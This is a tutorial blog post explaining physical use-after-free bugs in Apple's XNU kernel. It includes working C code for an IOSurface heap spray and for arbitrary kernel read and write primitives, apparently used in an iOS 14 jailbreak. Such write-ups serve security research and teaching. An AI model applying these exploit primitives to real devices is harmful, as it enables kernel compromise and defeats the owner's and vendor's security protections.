A step-by-step guide to writing an iOS kernel exploit

- Introduction

- Memory management in XNU

- Physical use-after-free

- Exploitation strategy

- Heap spray

- Kernel memory read/write

- Conclusion

- Bonus: arm64e, PPL and SPTM

Introduction

iOS exploits have always been a fascination of mine, and the particularly complicated kernel exploits have always been the most interesting of them all. As kernel exploitation has become much more difficult over the past few years, fewer traditional exploits (e.g. those that use a virtual memory corruption vulnerability) have been released. In spite of this, felix-pb released three exploits under the name kfd. First released in the summer of 2023, they were the first public kernel exploits to work on iOS 15.6 and above. While developing my iOS 14 jailbreak, Apex, I implemented a custom exploit for the PhysPuppet vulnerability, and in this blog post I will explain just how easy it is to exploit this type of bug, known as a “physical use-after-free”, on modern iOS.

I am by no means saying that kernel exploitation is easy; what I am saying is that physical use-after-frees have proven to be extremely powerful vulnerabilities, almost completely unaffected by the mitigations recently deployed in XNU. The strategy for exploiting these bugs is not only simple to write, but also simple to understand. So with that, let’s get into what a physical use-after-free is.

Sidenote: I certainly did not do this alone. I could not have written this exploit without the help of @staturnz, who has also written an exploit for PhysPuppet for iOS 12 and iOS 13. Before we start, the source code for this exploit is available here.

Memory management in XNU

XNU, the kernel that powers macOS, iOS, watchOS and pretty much every Apple operating system for almost three decades, manages memory similarly to most other operating systems. In XNU, there are two types of memory - physical memory and virtual memory.

Every process (even the kernel itself) has a virtual memory map. A Mach-O file (the Darwin executable format) defines a base address for each segment of the binary. For instance, if a Mach-O specifies a base address of 0x1000050000, the memory allocated to the process will appear to begin at 0x1000050000 and continue onwards. Obviously, this is not feasible with the actual physical memory used by the system: if two processes requested the same base address, or if their memory maps overlapped, it would immediately cause issues.

Physical memory begins at an address in the region of 0x800000000. Virtual memory, on the other hand, appears contiguous to a process: it looks like one single mapping of memory in which each page directly follows the previous one. Note: memory is divided into equally-sized ‘pages’ on most operating systems. On iOS, the page size is usually 16KB, or 4KB on older devices such as A8-equipped ones. For the sake of simplicity, this explanation will assume a page size of 16KB, or 0x4000 bytes.

To demonstrate how virtual memory works, imagine you have three pages of virtual memory:

- Page 1 @ 0x1000050000

- Page 2 @ 0x1000054000

- Page 3 @ 0x1000058000

Now, you could simply use memcpy() to copy 0xC000 bytes covering all three pages, and you wouldn’t notice anything. In reality, these pages are likely to be at completely different physical addresses. For example:

- Page 1 @ 0x800004000

- Page 2 @ 0x80018C000

- Page 3 @ 0x8000C4000

As you can see, virtual memory lets the system satisfy processes that require contiguous mappings of memory and pre-defined base addresses. When a process dereferences a pointer to a virtual memory address, the address is translated to a physical address, which is then read from or written to. But how is this translation done?
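Before looking at how the hardware does this, the idea can be sketched as a toy lookup table built from the three example pages above. This is a minimal C sketch, not how XNU or the MMU actually store mappings; `toy_translate` and the other names are hypothetical, and a real translation walks the multi-level page tables described next.

```c
#include <stdint.h>

#define TOY_PAGE_SIZE 0x4000ULL  /* 16KB pages, as assumed in this post */

/* Toy one-level "page table" for the example above: entry n holds the
   physical address backing virtual page n of the mapping. */
static const uint64_t toy_va_base = 0x1000050000ULL;
static const uint64_t toy_phys_pages[] = {
    0x800004000ULL,  /* Page 1 */
    0x80018C000ULL,  /* Page 2 */
    0x8000C4000ULL,  /* Page 3 */
};

/* Translates a virtual address inside the three-page mapping into its
   physical address; returns 0 if the address is not mapped. */
uint64_t toy_translate(uint64_t va) {
    if (va < toy_va_base) return 0;
    uint64_t page   = (va - toy_va_base) / TOY_PAGE_SIZE;  /* which virtual page */
    uint64_t offset = (va - toy_va_base) % TOY_PAGE_SIZE;  /* byte offset within it */
    if (page >= sizeof toy_phys_pages / sizeof toy_phys_pages[0]) return 0;
    return toy_phys_pages[page] + offset;
}
```

For example, `toy_translate(0x1000054000)` yields `0x80018C000`: the first byte of virtual page 2 is the first byte of physical page 2, even though the three physical pages are nowhere near each other.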

Page tables

As the name suggests, page tables (also known as translation tables) are tables that store information about the memory pages available to a process. For a regular userland process on iOS, the virtual address space spans from 0x0 to 0x8000000000. The translation between virtual and physical addresses is handled by the memory management unit (MMU), through which every memory access goes. When you try to dereference the pointer 0x1000000000, the MMU needs to look up the physical page that backs this address. This is where page tables come in.



Put simply, a page table is an array of 64-bit entries, each holding a physical address plus some flag bits. On modern iOS devices, there are three levels of page tables, each with a different granularity: each level 1 entry covers 0x1000000000 bytes of virtual memory, each level 2 entry covers 0x2000000 bytes, and each level 3 entry covers 0x4000 bytes (just a single page).

Each entry in a page table can either be a block mapping (which maps that whole region of virtual memory to a contiguous region of physical memory of the same size) or a pointer to a child page table (a level N table would have a level N+1 child table). At the bottom of the hierarchy, each level 3 entry simply maps a single page.

So, if you wrote the physical address 0x800000000 and the ‘block’ entry type flag (along with some other necessary flags) into the first entry of the level 2 page table covering 0x1000000000, the virtual addresses 0x1000000000 -> 0x1002000000 would be mapped to the physical addresses 0x800000000 -> 0x802000000 (a block’s physical address must be aligned to the 0x2000000-byte block size). However, if the entry had the ‘table’ entry type flag, it would instead hold the address of a level 3 page table, and each page between 0x1000000000 and 0x1002000000 would be mapped individually by one entry of that level 3 table.
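The level sizes above follow from the table size: a 16KB table holds 0x4000 / 8 = 2048 eight-byte entries, so each level consumes 11 bits of the virtual address (14 + 11 = 25, 25 + 11 = 36), and the 3 bits left over reach 39 bits, i.e. the 0x8000000000 userland limit. The sketch below, assuming that 16KB-granule, 39-bit layout, splits a virtual address into its per-level indices and shows how a level 2 block entry produces a physical address. The function names are hypothetical.

```c
#include <stdint.h>

/* Assumed layout: 16KB granule, 39-bit virtual addresses (0x0 - 0x8000000000). */
#define L3_SHIFT 14                /* one level 3 entry maps 0x4000 bytes        */
#define L2_SHIFT 25                /* one level 2 entry maps 0x2000000 bytes     */
#define L1_SHIFT 36                /* one level 1 entry maps 0x1000000000 bytes  */
#define TABLE_INDEX_MASK 0x7FFULL  /* a 16KB table holds 2048 8-byte entries     */

unsigned l1_index(uint64_t va) { return (unsigned)((va >> L1_SHIFT) & 0x7); } /* VA bits 38:36 */
unsigned l2_index(uint64_t va) { return (unsigned)((va >> L2_SHIFT) & TABLE_INDEX_MASK); }
unsigned l3_index(uint64_t va) { return (unsigned)((va >> L3_SHIFT) & TABLE_INDEX_MASK); }

/* Physical address produced by a level 2 block entry whose output address
   (which must be 0x2000000-aligned) is block_pa: the low 25 bits of the
   virtual address pass straight through as the offset into the block. */
uint64_t l2_block_translate(uint64_t block_pa, uint64_t va) {
    return block_pa | (va & ((1ULL << L2_SHIFT) - 1));
}
```

With these, `l1_index(0x1000000000)` is 1 and `l2_index(0x1000000000)` is 0, so the example above uses the first entry of the level 2 table reached through level 1 entry 1, and `l2_block_translate(0x800000000, 0x1001FFC000)` gives `0x801FFC000`.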

Physical use-after-free

If you’re still reading this, and didn’t get bored by the explanation of page tables, you should be fine for the rest of the blog post. Understanding page tables is key to understanding the root cause of a physical use-after-free.

Essentially, a physical use-after-free goes like this:

- A userland process allocates some virtual memory as readable and writable

- The page tables are updated to map in the corresponding physical address as readable and writable by the process

- The process deallocates the memory from userland

- Due to a physical use-after-free bug, the kernel does not remove the mapping from the page tables but ‘removes’ the mapping at the VM layer (which has the job of tracking allocations made by a process)

- As a result, the kernel’s VM layer believes the corresponding physical pages are free to use (and it adds the addresses of the pages to a global free page list)

- Thus, the process can read and write to a selection of pages that can be reused by the kernel as kernel memory without the kernel knowing!

What does this give us, as the attacker? Assuming the kernel decides to reallocate N of the freed pages as kernel memory, we now have the ability to read and write to N pages of random kernel memory from userspace. This is an extremely powerful primitive, because if an important kernel object is allocated on one of the pages we can still access, we can overwrite values and manipulate it to our liking.
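The sequence above can be modelled with a deliberately tiny simulation: four 16-byte "pages", one free list standing in for the VM layer, and a single page-table entry for the process. This is a hypothetical toy (none of these names exist in XNU), meant only to show why a stale page-table entry plus a reused physical page gives userland write access to kernel data.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_NPAGES    4
#define TOY_PAGE_SIZE 16   /* tiny "pages" to keep the model small */

static uint8_t phys_mem[TOY_NPAGES][TOY_PAGE_SIZE];                 /* "physical memory"     */
static bool    page_is_free[TOY_NPAGES] = {true, true, true, true}; /* VM layer's free list  */
static int     user_pte = -1;  /* the process's page-table entry: physical page, or -1 */

/* Takes a page off the free list (shared by userland and kernel allocations). */
static int take_free_page(void) {
    for (int p = 0; p < TOY_NPAGES; p++)
        if (page_is_free[p]) { page_is_free[p] = false; return p; }
    return -1;
}

/* Userland allocation: the VM layer hands out a page and the page table maps it. */
int user_alloc(void) { user_pte = take_free_page(); return user_pte; }

/* Buggy deallocation: the VM layer frees the page, but the page-table entry is
   never cleared, so the process keeps read/write access to the physical page. */
void user_dealloc_buggy(int page) { page_is_free[page] = true; }

/* Kernel allocation: may receive the very page the process can still reach. */
int kernel_alloc(void) { return take_free_page(); }

/* A userland write goes through the (possibly stale) page-table entry. */
bool user_write(size_t offset, uint8_t value) {
    if (user_pte < 0 || offset >= TOY_PAGE_SIZE) return false;
    phys_mem[user_pte][offset] = value;
    return true;
}
```

Running `user_alloc()`, then `user_dealloc_buggy()`, then `kernel_alloc()` hands the kernel the same page the process still maps, so a later `user_write(0, ...)` lands in what the kernel now considers its own memory.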

Exploitation strategy

While I won’t go into the details of each vulnerability (they are quite complicated; you can read the original writeups here), assume that each ‘trigger’ causes a physical use-after-free on an unknown number of physical pages.

We have a couple of problems to deal with here:

- We don’t know how many pages will be reallocated by the kernel

- We don’t know which pages will be reallocated by the kernel

- We don’t know the corresponding kernel virtual address for reallocated pages

We are given a random number of memory pages, each at a random address, from which an unknown number may be used as kernel memory at random kernel addresses. The best route to take from here is what is known as a “heap spray”.

Heap spray

Given the nature of the initial primitive, the most reliable way to turn it into more powerful primitives is, as the name suggests, to ‘spray’ kernel memory with a large number of the same object until one lands on a page of memory that we can write to.

First adapted for kfd by opa334, the IOSurface technique was originally used in the weightBufs kernel exploit and can be used to exploit a physical use-after-free. The whole heap spray process should go something like this:

- Allocate a large number of IOSurface objects (they are allocated inside kernel memory)

- When allocating each one, assign a ‘magic’ value to one of the fields, so that we can identify it

- Scan our freed pages for this magic value

- When we find an IOSurface on a freed page that we control, we have succeeded!

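```c
// Sprays nSurfaces IOSurfaces through the user client `client`, appending each
// new surface ID to *clients (capacity 0x4000 entries). fast_create_args_t,
// lock_result_t, IOSurfaceLockResultSize and IOSURFACE_MAGIC are defined
// elsewhere in the exploit.
void spray_iosurface(io_connect_t client, int nSurfaces, io_connect_t **clients, int *nClients) {
    for (int i = 0; i < nSurfaces; i++) {
        // Check on every iteration so the ID array can never overflow
        if (*nClients >= 0x4000) return;

        fast_create_args_t args;
        lock_result_t result;
        size_t size = IOSurfaceLockResultSize;

        args.address = 0;
        // Store (index + 1) so a surface found on a freed page can be
        // matched back to its ID in *clients
        args.alloc_size = *nClients + 1;
        // Magic value to search for in the freed pages
        args.pixel_format = IOSURFACE_MAGIC;

        // Selector 6 creates the IOSurface; skip the result if the call fails
        if (IOConnectCallMethod(client, 6, 0, 0, &args, 0x20, 0, 0, &result, &size) != KERN_SUCCESS) continue;

        io_connect_t id = result.surface_id;
        (*clients)[*nClients] = id;
        (*nClients)++;
    }
}
```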

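As you can see, IOSURFACE_MAGIC is the magic value we search for, and we simply allocate nSurfaces IOSurfaces with this magic value as their pixel format. Each surface’s alloc_size is also set to its index in the ID array plus one, so that a surface found on a freed page can be matched back to its ID.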

Then, by calling this repeatedly and scanning our freed pages after each round, we can locate an IOSurface that overlaps one of them, which is the basis for a kernel read/write primitive:

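```c
// Sprays IOSurfaces until one lands on a freed page we still have mapped.
// `info` is a global defined elsewhere in the exploit: info.object receives the
// userspace address of the overlapping object and info.surface its surface ID.
// The iosurface_get_* helpers and pages() are also defined elsewhere.
// Returns 0 on success, -1 if no surface was found (`puafPage` is unused here).
int iosurface_krw(io_connect_t client, uint64_t *puafPages, int nPages, uint64_t *self_task, uint64_t *puafPage) {
    io_connect_t *surfaceIDs = malloc(sizeof(io_connect_t) * 0x4000);
    if (!surfaceIDs) return -1;
    int nSurfaceIDs = 0;
    int found = 0;

    for (int i = 0; i < 0x400; i++) {
        spray_iosurface(client, 10, &surfaceIDs, &nSurfaceIDs);

        // Scan the first pages(1) / 16 bytes of each freed page, 8 bytes at a time
        for (int j = 0; j < nPages; j++) {
            uint64_t start = puafPages[j];
            uint64_t stop = start + (pages(1) / 16);

            for (uint64_t k = start; k < stop; k += 8) {
                if (iosurface_get_pixel_format(k) == IOSURFACE_MAGIC) {
                    info.object = k;
                    // alloc_size holds (index + 1) into surfaceIDs
                    info.surface = surfaceIDs[iosurface_get_alloc_size(k) - 1];
                    // The receiver field gives our task structure address
                    if (self_task) *self_task = iosurface_get_receiver(k);
                    found = 1;
                    goto sprayDone;
                }
            }
        }
    }

sprayDone:
    // Release every sprayed surface except the one on a freed page
    for (int i = 0; i < nSurfaceIDs; i++) {
        if (found && surfaceIDs[i] == info.surface) continue;
        iosurface_release(client, surfaceIDs[i]);
    }

    free(surfaceIDs);
    return found ? 0 : -1;
}
```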

We continuously spray IOSurface objects in a loop until we find one of these objects on one of our freed physical pages. When one is found, we save the address and ID of this object for later use, and read the receiver field of the IOSurface object to retrieve our task structure address.

Kernel memory read/write

At this point, we have an IOSurface object in kernel memory that we can read from and write to from userspace, as the physical page it resides in is also mapped into our process. But how do we use this to get a kernel read/write primitive?

An IOSurface object has two useful fields. The first is a pointer to the 32-bit use count of the object and the second is a pointer to a 64-bit “indexed timestamp”. By calling the methods to get the use count and set the indexed timestamp, but also overwriting the pointers to these values, we can achieve an arbitrary 32-bit kernel read and an arbitrary 64-bit kernel write.

For the read, we point the use count pointer at the target address minus 0x14 (the kernel reads the count 0x14 bytes past the stored pointer) and then call the method that returns the use count.

```c
// Selector 16 returns the 32-bit use count of the surface with ID `surfaceID`
uint32_t get_use_count(io_connect_t client, uint32_t surfaceID) {
    uint64_t args[1] = {surfaceID};
    uint32_t size = 1;
    uint64_t out = 0;
    IOConnectCallMethod(client, 16, args, 1, 0, 0, &out, &size, 0, 0);
    return (uint32_t)out;
}

// Arbitrary 32-bit kernel read: redirect the use count pointer of the
// overlapping IOSurface, read the "use count", then restore the pointer
uint32_t iosurface_kread32(uint64_t addr) {
    uint64_t orig = iosurface_get_use_count_pointer(info.object);
    iosurface_set_use_count_pointer(info.object, addr - 0x14); // Read is offset by 0x14
    uint32_t value = get_use_count(info.client, info.surface);
    iosurface_set_use_count_pointer(info.object, orig);
    return value;
}
```
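The pointer-redirection trick in `iosurface_kread32` can be illustrated without any kernel at all. In this hypothetical toy model, a byte array stands in for kernel memory, `toy_surface` stands in for the IOSurface object, and the getter reads 0x14 bytes past the stored pointer, mirroring the offset described above. It is a sketch of the idea, not the real IOSurface layout.

```c
#include <stdint.h>
#include <string.h>

/* Toy model: sim_mem stands in for kernel memory; "pointers" are offsets into it
   (callers must keep addr <= sizeof sim_mem - 4, there is no bounds check). */
static uint8_t sim_mem[256];

/* Hypothetical stand-in for the IOSurface object; only the pointer field matters. */
struct toy_surface {
    uint64_t use_count_ptr;  /* the getter reads 4 bytes at use_count_ptr + 0x14 */
};

/* Models the getter: it blindly trusts whatever pointer the object holds. */
static uint32_t toy_get_use_count(const struct toy_surface *s) {
    uint32_t value;
    memcpy(&value, &sim_mem[s->use_count_ptr + 0x14], sizeof value);
    return value;
}

/* Same shape as iosurface_kread32: save the pointer, aim it at addr - 0x14 so the
   +0x14 lands exactly on addr, call the getter, then restore the original pointer. */
uint32_t toy_kread32(struct toy_surface *s, uint64_t addr) {
    uint64_t orig = s->use_count_ptr;
    s->use_count_ptr = addr - 0x14;  /* unsigned arithmetic: adding 0x14 gives addr back */
    uint32_t value = toy_get_use_count(s);
    s->use_count_ptr = orig;
    return value;
}
```

Because the original pointer is restored after every read, the object is left as it was found, which is the same reason the real helpers save and restore `orig`.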

For the write, we overwrite the indexed timestamp pointer and then call the method to set the indexed timestamp.

```c
// Selector 33 sets the indexed timestamp of surface `surfaceID` to `value`
void set_indexed_timestamp(io_connect_t client, uint32_t surfaceID, uint64_t value) {
    uint64_t args[3] = {surfaceID, 0, value};
    IOConnectCallMethod(client, 33, args, 3, 0, 0, 0, 0, 0, 0);
}

// Arbitrary 64-bit kernel write: redirect the indexed timestamp pointer,
// "set the timestamp", then restore the original pointer
void iosurface_kwrite64(uint64_t addr, uint64_t value) {
    uint64_t orig = iosurface_get_indexed_timestamp_pointer(info.object);
    iosurface_set_indexed_timestamp_pointer(info.object, addr);
    set_indexed_timestamp(info.client, info.surface, value);
    iosurface_set_indexed_timestamp_pointer(info.object, orig);
}
```

With that, we have (fairly) stable kernel memory read and write primitives, and the kernel exploit is complete! The 32-bit read can be turned into a read of any size (by reading multiple times, or by truncating the 32-bit value to fewer bits), and the same goes for the 64-bit write (by reading the 64-bit value, changing the bits of interest and writing the value back).
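As a sketch of those two conversions, the code below builds a 64-bit read from two 32-bit reads and a 32-bit write from a 64-bit read-modify-write. To keep it runnable anywhere, `kread32` and `kwrite64` here are hypothetical stand-ins operating on a small array rather than kernel memory; in the exploit they would be `iosurface_kread32` and `iosurface_kwrite64`. It assumes a little-endian layout, as on arm64.

```c
#include <stdint.h>
#include <string.h>

/* Stand-in memory so the sketch runs anywhere. Addresses are offsets into
   fake_mem and must leave room for an 8-byte access (addr <= 56). */
static uint8_t fake_mem[64];

static uint32_t kread32(uint64_t addr) {
    uint32_t v;
    memcpy(&v, &fake_mem[addr], sizeof v);
    return v;
}

static void kwrite64(uint64_t addr, uint64_t v) {
    memcpy(&fake_mem[addr], &v, sizeof v);
}

/* 64-bit read from two 32-bit reads: little-endian, so the word at addr
   is the low half and the word at addr + 4 is the high half. */
uint64_t kread64(uint64_t addr) {
    return (uint64_t)kread32(addr) | ((uint64_t)kread32(addr + 4) << 32);
}

/* 32-bit write as a 64-bit read-modify-write: the upper 4 bytes are written
   back unchanged. Not atomic: a concurrent change to those bytes between
   the read and the write would be lost. */
void kwrite32(uint64_t addr, uint32_t value) {
    uint64_t old = kread64(addr);
    kwrite64(addr, (old & 0xFFFFFFFF00000000ULL) | value);
}
```

Smaller writes (8 or 16 bits) follow the same pattern with a different mask.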

The next step for a jailbreak would be to develop more stable read and write primitives by modifying the process’s page tables, which will be covered in a future blog post. This is fairly easy to do on arm64 devices, but for arm64e devices (A12+) page tables are protected by PPL, so a PPL bypass is needed to write to them.

So, for a quick recap, the entire exploit flow goes something like this:

- Trigger the physical use-after-free to get an arbitrary number of freed pages

- Allocate a large number of IOSurface objects containing a magic value inside kernel memory

- Wait until an IOSurface object lands on one of your free pages that you can write to

- Abuse the physical use-after-free to change pointers in the IOSurface object, allowing you to call IOSurface methods that perform arbitrary reads and writes using these pointers

Conclusion

In this blog post, I showed that physical use-after-frees can be fairly simple kernel vulnerabilities to exploit, even on more recent iOS versions. The IOSurface technique works as-is up until iOS 16, where certain fields usable for kernel read/write were PAC’d on arm64e devices, in addition to other underlying changes that also break the read primitive on arm64 devices.

As a reminder, the source code for this exploit is available here. In the future, I will be publishing another blog post detailing the development process of my open-source iOS 14 jailbreak, Apex, which uses this exploit. For now, I hope you enjoyed this post, and if you have any questions or concerns at all, please don’t hesitate to email me.

Bonus: arm64e, PPL and SPTM

iOS 17 introduced the Secure Page Table Monitor (SPTM) and the Trusted Execution Monitor (TXM) on A15 devices and newer. Until then, page tables were managed by the Page Protection Layer (PPL), which runs at a higher privilege level than the kernel. There were extra protections to ensure that neither userland nor the kernel itself could still access a page once it had been handed to the PPL. In iOS 17, Apple split PPL into two monitors that run inside “guarded exception levels”. These are far more privileged than PPL was, so much so that SPTM is the first code that runs after iBoot and is responsible for mapping the kernel into memory.

In kfd, there is a function called puaf_helper_give_ppl_pages which forces the kernel to fill up the PPL’s list of available free memory pages. If this is not called before running the main exploit, there is a chance that the PPL will try to claim one of the freed pages, which will cause a “page still has mappings” kernel panic triggered by the PPL.

Quite quickly after kfd was first released, people realised that it supported some of the earlier iOS 17 betas. Not long after that, people found that it did not work on SPTM-supported devices (see this tweet). A lot of people took this to mean that SPTM had killed any chance of exploiting physical use-after-frees. I have both good and bad news with regards to this.

The good news: the panic in that tweet does not mean that SPTM prevented the physical use-after-free from being exploited. It is actually the SPTM equivalent of the PPL’s “page still has mappings” panic, meaning that the trick used in puaf_helper_give_ppl_pages in kfd does not work with the SPTM’s page allocator. In fact, the original author of that tweet even confirmed that the exploit did not always panic, so it was just a game of chance.

The bad news: SPTM was later used to kill physical use-after-frees. As the SPTM oversees the allocation of all pages, it can track pages and what they are allocated for much more accurately. As of a later version of iOS 17 (I am unsure which one), it ensures that a page allocated as userspace memory can never be reallocated as kernel memory until the next boot. This means that the most you can do with a physical use-after-free under SPTM is read and write the memory of another userspace process.
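The rule described above can be pictured as a per-frame type that outlives frees. The sketch below is a hypothetical toy model of that policy only, not SPTM's actual implementation or data structures: once a frame has been handed out as user memory, any later attempt to claim it as kernel memory is refused until the program (standing in for the device) restarts. Under such a rule, the pages freed by a physical use-after-free can only come back as user memory, which is why the attack is limited to other userspace processes.

```c
#include <stdbool.h>

/* Hypothetical toy model of the policy described above, NOT SPTM's real
   implementation. Frame types are never reset when a frame is freed, so a
   type persists until "reboot" (here, until the program restarts). */
enum frame_type { FRAME_UNTYPED, FRAME_USER, FRAME_KERNEL };

#define TOY_NFRAMES 8
static enum frame_type frame_types[TOY_NFRAMES];  /* static storage: all FRAME_UNTYPED */

/* Tries to hand out frame f as `want`. A frame that has ever been user
   memory is refused as kernel memory; this model encodes only that rule. */
bool toy_claim_frame(int f, enum frame_type want) {
    if (f < 0 || f >= TOY_NFRAMES || want == FRAME_UNTYPED) return false;
    if (frame_types[f] == FRAME_USER && want == FRAME_KERNEL) return false;
    frame_types[f] = want;
    return true;
}
```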

Overall, this can’t come as much of a surprise, given how powerful these bugs were in the face of the latest XNU exploit mitigations. Kernel ASLR, PAN, zone_require and kalloc_type have virtually no impact on them; PPL can interfere, but this can be worked around (as shown above); and PAC only limits which objects you can use to gain kernel read/write primitives (as data PAC protects kernel pointers in many objects from being modified).